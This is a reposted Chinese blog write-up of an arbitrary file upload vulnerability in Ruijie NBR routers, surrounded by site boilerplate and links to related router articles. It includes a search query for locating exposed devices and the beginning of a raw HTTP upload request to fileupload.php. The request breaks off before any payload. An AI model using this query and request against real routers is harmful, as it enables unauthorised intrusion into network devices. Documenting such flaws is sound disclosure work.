锐捷NBR路由器fileupload.php任意文件上传漏洞

10月前作者：xiaokp7 分类：Toy博客阅读(42) 违法举报

这篇具有很好参考价值的文章主要介绍了锐捷NBR路由器fileupload.php任意文件上传漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

一、漏洞简介

锐捷NBR路由器是锐捷网络科技有限公司推出的一款高性能企业级路由器。NBR是"Next-Generation Broadband Router"的缩写，意为"下一代宽带路由器"。该路由器具有强大的处理能力和丰富的功能，适用于中小型企业、校园网络和数据中心等场景。锐捷 NBR 路由器存在任意文件上传漏洞，可能导致执行恶意代码、服务器拒绝服务、数据泄露、网站篡改和横向渗透等危害。文章来源地址https://www.toymoban.com/news/detail-712420.html

二、影响版本

锐捷NBR路由器

三、资产测绘

hunterapp.name=="Ruijie 锐捷 EWEB"
登录页面

四、漏洞复现

POST /ddi/server/fileupload.php HTTP/1.1
Content-Type: multipart/form-data; boundary=00content0boundary00
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 219

--00content0boundary00
Content-Disposition: form-data; name="uploadDir"

upload
--00content0boundary00
Content-Disposition: for

到了这里，关于锐捷NBR路由器fileupload.php任意文件上传漏洞的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

锐捷路由器配置命令完美宝典

关于锐捷路由器配置命令，相信懂的人还不是很多，没有关系，下面就针对锐捷路由器，给大家详细的讲解一下，这些命令可能用的都不是很多，但是对于网络安全和性能来说很重要。复制代码代码如下: #Exit返回上一级操作模式 #del flash:config.text删除配置文件(交换机及170

2024年02月07日
浏览(46)
锐捷RSR系列路由器_接入路由器交换模块配置_IP+MAC绑定

目录 01 IP+MAC绑定配置案例 02 IP+MAC绑定常见问题功能介绍 IP/MAC地址绑定是指路由器将与其直接相连的网络上的主机的MAC 地址和 IP 地址进行捆绑记录，只有指定的 MAC 地址才可以用相应的 IP 地址。这种机制可以防止被绑定的主机的IP地址不被假冒。应用这种机制有两个前

2024年02月04日
浏览(62)
锐捷RSR系列路由器_接入路由器交换模块配置_802.1x认证配置

目录 01 RSR10-02E、RSR20-14E-F802.1x认证配置 02 802.1X认证常见问题和故障 03 路由器重启802.1X认证失败的解决方案功能介绍 RSR10-02E、RSR20-14E/F固化交换端口，没有登陆交换卡这种概念，也无法登陆交换卡。路由/交换的所有配置都在路由器的CLI界面完成。一、组网需求：

2024年03月16日
浏览(61)
锐捷RSR系列路由器—VPN功能—GRE 功能配置

目录功能介绍应用场景一、组网需求二、组网拓扑三、配置要点四、配置步骤五、配置验证 GRE（Generic Routing Encapsulation，通用路由封装）协议是对某些网络层协议（如IP 和IPX）的数据报文进行封装，使这些被封装的数据报文能够在另一个网络层协议（如IP）中传输。

2024年02月04日
浏览(51)
锐捷RSR系列路由器_安全_ACL访问控制列表

目录 01 ACL简介 02 标准ACL 03 扩展ACL 04 基于时间段的ACL 05 自反ACL 功能介绍： ACL 的全称为访问控制列表(Access Control Lists)，俗称为防火墙，还称之为包过滤。ACL通过定义一些规则，对网络设备接口上的数据报文进行控制，根据匹配条件，决定是允许其通过(Permit) 还是丢弃

2024年02月04日
浏览(51)
锐捷睿易：路由器WAN口三种上网方式的选择

拨号上网：有些路由器也叫宽带上网、ADSL拨号、PPPOE拨号等拨号上网方式是向运营商办宽带的时候，运营商会给你一个账号、密码在路由器上WAN口设置里选择连接了光猫的口，输入运营商给的账号和密码就可以上网了动态获取：也叫自动获取、DHCP上网、动态IP上网等上

2024年02月12日
浏览(47)
锐捷RSR系列路由器_安全_NAT 网络地址转换

目录 01 NAT简介 02 源地址转换 2.1 上网配置-ADSL拨号（PPPoE）出口 2.2 上网配置——无交换口路由器 2.3 上网配置——固化交换模块路由器 2.4 上网配置——多出口及permit-inside功能 03 外部源地址转换 04 NAT实现TCP负载均衡 05 双向NAT转换 06 VRF NAT 07 常见问题和故障

2024年02月04日
浏览(48)
锐捷交换机，路由器，无线，ESS,EG所有操作配置命令合集

接口注释 description Con_To_XX 记得/30的直连物理路由端口写ip ospf network point-to-point Ruijie(config-GigabitEthernet 0/0)#media-type basex force ---将接口切成光模式 Ruijie(config-GigabitEthernet 0/0)#media-type baset ---将接口从光口切换电口模式（接口默认属于该模式，show run该命令不显示） show ip f f

2024年02月12日
浏览(69)
使用锐捷RG-EG210G-E路由器实现三个网段局域网互通

背景需求：当前有三个网段的局域网，交换机A组成的局域网192.168.1.0/24，交换机B组成的局域网192.168.3.0/24，以及交换机C组成的局域网10.10.6.0/24 ，现在需要这三个局域网中的计算机可以通信。大体思路：二层交换机通过MAC地址寻找目标机器，无法实现跨网段的数据通信，所

2024年02月11日
浏览(356)
【漏洞复现】H3C路由器信息泄露任意用户登录

通过访问特地址得到密码可进行登录。技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信

2024年02月09日
浏览(50)